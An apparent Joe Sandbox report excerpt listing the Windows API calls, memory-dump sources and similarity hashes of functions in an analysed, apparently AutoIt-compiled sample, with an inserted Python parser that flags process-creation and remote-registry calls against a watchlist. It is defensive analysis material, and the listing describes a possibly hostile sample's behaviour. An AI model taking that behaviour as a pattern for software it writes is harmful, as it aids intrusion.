                                                                                                                              • Instruction ID: 308a4bd464ee4a4c20d58e114adb3f864f9a81979845c1360b8db941df409eed
                                                                                                                              • Opcode Fuzzy Hash: 5bc90397e43aa2dacbf9e6e11ee352ab675891efe261ed771759bd94d0caf96e
                                                                                                                              • Instruction Fuzzy Hash: 9501F274401701AFDF18BB74E909D2D7BA6FF263147148519F9098B652EF35D883CA91
APIs
• _memset.LIBCMT ref: 001DE14D
• _memset.LIBCMT ref: 001DE15C
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00233EE0,00233F24), ref: 001DE18B
• CloseHandle.KERNEL32 ref: 001DE19D
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID: $?#$>#
• API String ID: 3277943733-3324046207
• Opcode ID: c3e28b74bae600a4a79272d2b5dd30f021f9f27a0a7e7155e08d582951b20a01
• Instruction ID: 2fb13f048ac8a07d0128943db96ccbb4e486a49eeab9f96b53671b9fc3d7cd75
• Opcode Fuzzy Hash: c3e28b74bae600a4a79272d2b5dd30f021f9f27a0a7e7155e08d582951b20a01
• Instruction Fuzzy Hash: ECF0E2F1A50301BFF700AB21BC0AF777AADEB09799F000020BA04D51A2D3B68F5086E4
APIs
• GetClientRect.USER32(?,?), ref: 0018C6C0
• GetWindowRect.USER32(?,?), ref: 0018C701
• ScreenToClient.USER32(?,000000FF), ref: 0018C729
• GetClientRect.USER32(?,?), ref: 0018C856
• GetWindowRect.USER32(?,?), ref: 0018C86F
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
• Opcode ID: b989744f4609a5f19bc61394729aae968bde603672a5cd3d5e89b743e16a482d
• Instruction ID: 6f278ea8363feec617b09a8d0d04887b95f842e251dd23492f319c7961b9ec6f
• Opcode Fuzzy Hash: b989744f4609a5f19bc61394729aae968bde603672a5cd3d5e89b743e16a482d
• Instruction Fuzzy Hash: B8B1477990064ADBDB14DFA9C4807EDB7B1FF08710F15912AEC59EB254EB30AA40CFA4
APIs
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: _memmove$__itow__swprintf
• String ID:
• API String ID: 3253778849-0
• Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
• Instruction ID: 41bcc6e4d24b56022977596a0a6c3fcc07b3afe94db84fec746b4ce7dcc0fd28
• Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
• Instruction Fuzzy Hash: 5F619E3050024AAFCF06EF60CC81EFE77B9AF58314F448459F95A6B292EB74E906CB51
APIs
  • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
  • Part of subcall function 001D3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001D2AA6,?,?), ref: 001D3B0E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001D2FA0
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001D2FE0
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 001D3003
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001D302C
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 001D306F
• RegCloseKey.ADVAPI32(00000000), ref: 001D307C
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• String ID:
• API String ID: 4046560759-0
• Opcode ID: 04663a17b70e8618cc69c0ce6f70648db6c32ccb9e9ac043814dd956ac9f1c4b
• Instruction ID: 3ada27b4de37cadd5e48f19aa38ee75caa0a0d549eecbb21bf911d7d52ad7631
• Opcode Fuzzy Hash: 04663a17b70e8618cc69c0ce6f70648db6c32ccb9e9ac043814dd956ac9f1c4b
• Instruction Fuzzy Hash: 1E513871108204AFC705EF64C885E6FBBF9BF98704F04891EF595872A1DB71EA45CB52
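Reading hundreds of these per-function blocks by hand is slow, and the listing mixes a function's own calls with calls inherited from callees ("Part of subcall function"), which is why the registry block above shows _memmove and CharUpperBuffW even though the function itself only touches ADVAPI32. The following parser is an added example, not part of the Joe Sandbox report or of the analysed sample: it splits the listing into blocks, keeps direct and subcall APIs apart, strips the "Download File" link text fused onto the Associated lines, and flags blocks whose direct calls hit a watchlist. The watchlist is an assumption chosen for illustration, and SAMPLE is constructed from the CreateProcessW block and the RegEnumValueW block shown above.

```python
"""Triage helper for the per-function blocks Joe Sandbox's IDA plugin emits
(APIs / Memory Dump Source / Similarity / ... / Instruction Fuzzy Hash).
Added example, not part of the report; SAMPLE is constructed from the
CreateProcessW and RegEnumValueW blocks of this listing."""
import re
from dataclasses import dataclass, field

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function ADDR: " (a call made by a callee).
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_$][\w@$]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "• Key: value" lines of the Memory Dump Source / Similarity sections.
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")
LINK_RESIDUE = "Download File"  # link text fused onto 'Associated:' lines
# Assumed watchlist for this example; extend it to the APIs you care about.
WATCHLIST = {"CreateProcessW", "RegConnectRegistryW", "RegEnumValueW", "RtlExitUserThread"}


@dataclass
class FunctionBlock:
    direct_apis: list = field(default_factory=list)   # (api, module, ref)
    subcall_apis: list = field(default_factory=list)  # (callee, api, module, ref)
    fields: dict = field(default_factory=dict)        # key -> value; Associated -> list


def parse_blocks(text):
    """Split the listing into FunctionBlock objects; each starts at 'APIs'."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue  # section headers, or text before the first block
        m = API_RE.match(line)
        if m:
            entry = (m.group("api"), m.group("module"), m.group("ref"))
            if m.group("callee"):
                cur.subcall_apis.append((m.group("callee"),) + entry)
            else:
                cur.direct_apis.append(entry)
            continue
        m = FIELD_RE.match(line)
        if m:
            key = m.group("key")
            value = m.group("value").replace(LINK_RESIDUE, "").strip()
            if key == "Associated":
                cur.fields.setdefault(key, []).append(value)
            else:
                cur.fields[key] = value
    return blocks


def call_sequence(block):
    """Direct calls in address order, as (ref, 'Api.MODULE')."""
    return sorted(((ref, f"{api}.{mod}") for api, mod, ref in block.direct_apis),
                  key=lambda t: int(t[0], 16))


def triage(blocks, watchlist=WATCHLIST):
    """Block index -> sorted watchlisted APIs the block calls directly.
    Subcall entries are ignored on purpose: they belong to the callee, and
    counting them would flag every caller of a shared helper."""
    hits = {}
    for i, blk in enumerate(blocks):
        matched = sorted({api for api, _, _ in blk.direct_apis} & watchlist)
        if matched:
            hits[i] = matched
    return hits


SAMPLE = """\
APIs
• _memset.LIBCMT ref: 001DE14D
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00233EE0,00233F24), ref: 001DE18B
• CloseHandle.KERNEL32 ref: 001DE19D
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
Similarity
• String ID: $?#$>#
• Instruction Fuzzy Hash: ECF0E2F1A50301BFF700AB21BC0AF777AADEB09799F000020BA04D51A2D3B68F5086E4
APIs
  • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
  • Part of subcall function 001D3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001D2AA6,?,?), ref: 001D3B0E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001D2FA0
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001D2FE0
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001D302C
• RegCloseKey.ADVAPI32(00000000), ref: 001D307C
Similarity
• String ID:
• Instruction Fuzzy Hash: 1E513871108204AFC705EF64C885E6FBBF9BF98704F04891EF595872A1DB71EA45CB52
"""

if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE)
    for idx, apis in triage(parsed).items():
        print(f"block {idx}: {apis}")
        for ref, call in call_sequence(parsed[idx]):
            print(f"  {ref} {call}")
```

Feed it the whole "Joe Sandbox IDA Plugin" section of the report (after the indentation is trimmed; the parser strips leading whitespace per line) and use the ref addresses of the hits to jump straight to the function in the snapshot. One caveat the table cannot resolve: the arguments shown as "?" are values the plugin could not recover statically, so for RegConnectRegistryW the listing does not tell you whether the machine-name argument is empty (local registry) or a remote host; that has to be checked in the decompiled function or in the dynamic trace.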
APIs
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: _wcscpy$_wcscat
• String ID:
• API String ID: 2037614760-0
• Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
• Instruction ID: a8a93ff33fe56543d74d7d984cd011d0a22262e935078478bb7310a6af2d5f70
• Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
• Instruction Fuzzy Hash: 9C51F230900315AACF15BF99E4419BDB3B1EF15720F50804EF580AB2D2DBB49F82DB91
                                                                                                                              APIs
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 001B2AF6
                                                                                                                              • VariantClear.OLEAUT32(00000013), ref: 001B2B68
                                                                                                                              • VariantClear.OLEAUT32(00000000), ref: 001B2BC3
                                                                                                                              • _memmove.LIBCMT ref: 001B2BED
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 001B2C3A
                                                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 001B2C68
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType_memmove
• String ID:
• API String ID: 1101466143-0
APIs
• GetMenu.USER32(?), ref: 001D833D
• GetMenuItemCount.USER32(00000000), ref: 001D8374
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001D839C
• GetMenuItemID.USER32(?,?), ref: 001D840B
• GetSubMenu.USER32(?,?), ref: 001D8419
• PostMessageW.USER32(?,00000111,?,00000000), ref: 001D846A
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
• API String ID: 650687236-0
APIs
• _memset.LIBCMT ref: 001B552E
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001B5579
• IsMenu.USER32(00000000), ref: 001B5599
• CreatePopupMenu.USER32 ref: 001B55CD
• GetMenuItemCount.USER32(000000FF), ref: 001B562B
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 001B565C
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
APIs
  • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
• BeginPaint.USER32(?,?,?,?,?,?), ref: 0018B1C1
• GetWindowRect.USER32(?,?), ref: 0018B225
• ScreenToClient.USER32(?,?), ref: 0018B242
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0018B253
• EndPaint.USER32(?,?), ref: 0018B29D
Similarity
• API ID: PaintWindow$BeginClientLongRectScreenViewport
• String ID:
• API String ID: 1827037458-0
APIs
• ShowWindow.USER32(00231810,00000000,?,?,00231810,00231810,?,001EE2D6), ref: 001DE21B
• EnableWindow.USER32(?,00000000), ref: 001DE23F
• ShowWindow.USER32(00231810,00000000,?,?,00231810,00231810,?,001EE2D6), ref: 001DE29F
• ShowWindow.USER32(?,00000004,?,?,00231810,00231810,?,001EE2D6), ref: 001DE2B1
• EnableWindow.USER32(?,00000001), ref: 001DE2D5
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 001DE2F8
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
APIs
  • Part of subcall function 0018B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0018B5EB
  • Part of subcall function 0018B58B: SelectObject.GDI32(?,00000000), ref: 0018B5FA
  • Part of subcall function 0018B58B: BeginPath.GDI32(?), ref: 0018B611
  • Part of subcall function 0018B58B: SelectObject.GDI32(?,00000000), ref: 0018B63B
• MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 001DE9F2
• LineTo.GDI32(00000000,00000003,?), ref: 001DEA06
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 001DEA14
• LineTo.GDI32(00000000,00000000,?), ref: 001DEA24
• EndPath.GDI32(00000000), ref: 001DEA34
• StrokePath.GDI32(00000000), ref: 001DEA44
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
APIs
• GetDC.USER32(00000000), ref: 001AEFB6
• GetDeviceCaps.GDI32(00000000,00000058), ref: 001AEFC7
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 001AEFCE
• ReleaseDC.USER32(00000000,00000000), ref: 001AEFD6
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 001AEFED
• MulDiv.KERNEL32(000009EC,?,?), ref: 001AEFFF
  • Part of subcall function 001AA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,001AA79D,00000000,00000000,?,001AAB73), ref: 001AB2CA
Similarity
• API ID: CapsDevice$ExceptionRaiseRelease
• String ID:
• API String ID: 603618608-0
APIs
• __init_pointers.LIBCMT ref: 001987D7
  • Part of subcall function 00191E5A: __initp_misc_winsig.LIBCMT ref: 00191E7E
  • Part of subcall function 00191E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00198BE1
  • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00198BF5
  • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00198C08
  • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00198C1B
  • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00198C2E
  • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00198C41
  • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00198C54
  • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00198C67
  • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00198C7A
  • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00198C8D
  • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00198CA0
  • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00198CB3
  • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00198CC6
  • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00198CD9
  • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00198CEC
  • Part of subcall function 00191E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00198CFF
• __mtinitlocks.LIBCMT ref: 001987DC
  • Part of subcall function 00198AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0022AC68,00000FA0,?,?,001987E1,00196AFA,002267D8,00000014), ref: 00198AD1
• __mtterm.LIBCMT ref: 001987E5
  • Part of subcall function 0019884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 001989CF
  • Part of subcall function 0019884D: _free.LIBCMT ref: 001989D6
  • Part of subcall function 0019884D: RtlDeleteCriticalSection.NTDLL(0022AC68), ref: 001989F8
• __calloc_crt.LIBCMT ref: 0019880A
• GetCurrentThreadId.KERNEL32 ref: 00198833
Similarity
• API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
• String ID:
• API String ID: 2942034483-0
• Opcode ID: d702b5e1fe53d9e2ab7382b3998160e82a0f7ede598fa1f4876a674649865cde
• Instruction ID: 7a56c567857c5525ea3e95dbce86e30ca8bf895b45e6793fd5b9cc7185e86961
• Opcode Fuzzy Hash: d702b5e1fe53d9e2ab7382b3998160e82a0f7ede598fa1f4876a674649865cde
• Instruction Fuzzy Hash: 50F089331197516AFE787BBCBC0765A3AD49F23B70B650A2EF464D60E2FF1098414175
Similarity
• API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 1423608774-0
• Opcode ID: 6dd520a9d9d124147733cd7f1a142731039da469bfdc0f7c40433259100aeba1
• Instruction ID: 184422e8e375276b90a3ec12f5c126d7a2e550545dbb474c4dd2257f53cf9893
• Opcode Fuzzy Hash: 6dd520a9d9d124147733cd7f1a142731039da469bfdc0f7c40433259100aeba1
• Instruction Fuzzy Hash: 4B01A432101211ABD7152B58FD48EFF7BBAFF89702B800529F603929B1CB74A841CBA1
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00171898
• MapVirtualKeyW.USER32(00000010,00000000), ref: 001718A0
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 001718AB
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 001718B6
• MapVirtualKeyW.USER32(00000011,00000000), ref: 001718BE
• MapVirtualKeyW.USER32(00000012,00000000), ref: 001718C6
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: 45bacdb9b35191932b083b0e3ee788d3bfe1b67b952b604aa83e3fc14b6b5a68
• Instruction ID: 563ab3fd99c4921cc70832d8c7486bdfd524cb00172508efdd939197d5980a3f
• Opcode Fuzzy Hash: 45bacdb9b35191932b083b0e3ee788d3bfe1b67b952b604aa83e3fc14b6b5a68
• Instruction Fuzzy Hash: 880167B0902B5ABDE3008F6A8C85B52FFB8FF19354F04411BA15C87A42C7F5A864CBE5
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001B8504
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001B851A
• GetWindowThreadProcessId.USER32(?,?), ref: 001B8529
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001B8538
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001B8542
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001B8549
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: 5673efe9bd0517853f0883e61b5ddc2b4b0363a1b80b8afeba898dd464547b3f
• Instruction ID: 49a18a1e78300b66dc79b729bb9e1b10c3a6d3d714f2b1546179bf61649972d3
• Opcode Fuzzy Hash: 5673efe9bd0517853f0883e61b5ddc2b4b0363a1b80b8afeba898dd464547b3f
• Instruction Fuzzy Hash: B0F05E72240158BBE7215B62AD0EEFF7F7DDFC6B25F000058FA05D1050EBA06A81C6B5
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 001BA330
• RtlEnterCriticalSection.NTDLL(?), ref: 001BA341
• TerminateThread.KERNEL32(?,000001F6,?,?,?,001E66D3,?,?,?,?,?,0017E681), ref: 001BA34E
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,001E66D3,?,?,?,?,?,0017E681), ref: 001BA35B
  • Part of subcall function 001B9CCE: CloseHandle.KERNEL32(?,?,001BA368,?,?,?,001E66D3,?,?,?,?,?,0017E681), ref: 001B9CD8
• InterlockedExchange.KERNEL32(?,000001F6), ref: 001BA36E
• RtlLeaveCriticalSection.NTDLL(?), ref: 001BA375
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: adb97dc365fc03075d7677faac06657184cfc1474b71f91902180ecdadb4fe8f
• Instruction ID: 62d0c98d2a00a73bfe6e06c77151585a104a36b59f70a442339495f8567a71ba
• Opcode Fuzzy Hash: adb97dc365fc03075d7677faac06657184cfc1474b71f91902180ecdadb4fe8f
• Instruction Fuzzy Hash: 65F05E72141211ABD3112B68FD48EFF7B7AFF89302B400521F203918B1CBB59891CB91
APIs
  • Part of subcall function 0019010A: std::exception::exception.LIBCMT ref: 0019013E
  • Part of subcall function 0019010A: __CxxThrowException@8.LIBCMT ref: 00190153
  • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
  • Part of subcall function 0017BBD9: _memmove.LIBCMT ref: 0017BC33
• __swprintf.LIBCMT ref: 0018D98F
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0018D832
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                              • API String ID: 1943609520-557222456
                                                                                                                              • Opcode ID: a912cdd51e05e1bd3422ba2bab755cc2b6523a44c6cf0cc988e63aadfe60afea
                                                                                                                              • Instruction ID: cc8a4aef6fe38bcdabcccb0929c16e8d497e538a4074a8ca5d85f51346d60550
                                                                                                                              • Opcode Fuzzy Hash: a912cdd51e05e1bd3422ba2bab755cc2b6523a44c6cf0cc988e63aadfe60afea
                                                                                                                              • Instruction Fuzzy Hash: 4C915831508742AFC714EF64D886D6EB7B4AFA9700F004919F99A972A1EB70EE44CB52
APIs
• VariantInit.OLEAUT32(?), ref: 001CB4A8
• CharUpperBuffW.USER32(?,?), ref: 001CB5B7
• VariantClear.OLEAUT32(?), ref: 001CB73A
  • Part of subcall function 001BA6F6: VariantInit.OLEAUT32(00000000), ref: 001BA736
  • Part of subcall function 001BA6F6: VariantCopy.OLEAUT32(?,?), ref: 001BA73F
  • Part of subcall function 001BA6F6: VariantClear.OLEAUT32(?), ref: 001BA74B
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4237274167-1221869570
• Opcode ID: 6c18350855c3810f8308860e7281f76c4eda899e857e5b7da8260f93657d520e
• Instruction ID: 0de31644a01401edf4120da1da88b68388bb034789dc0f9c7d497ab3e824460d
• Opcode Fuzzy Hash: 6c18350855c3810f8308860e7281f76c4eda899e857e5b7da8260f93657d520e
• Instruction Fuzzy Hash: BD917B746083019FCB10DF24D485E6AB7F5AFA9710F04882DF88ADB362DB31E945CB52
APIs
  • Part of subcall function 00173BCF: _wcscpy.LIBCMT ref: 00173BF2
• _memset.LIBCMT ref: 001B5E56
• GetMenuItemInfoW.USER32(?), ref: 001B5E85
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001B5F31
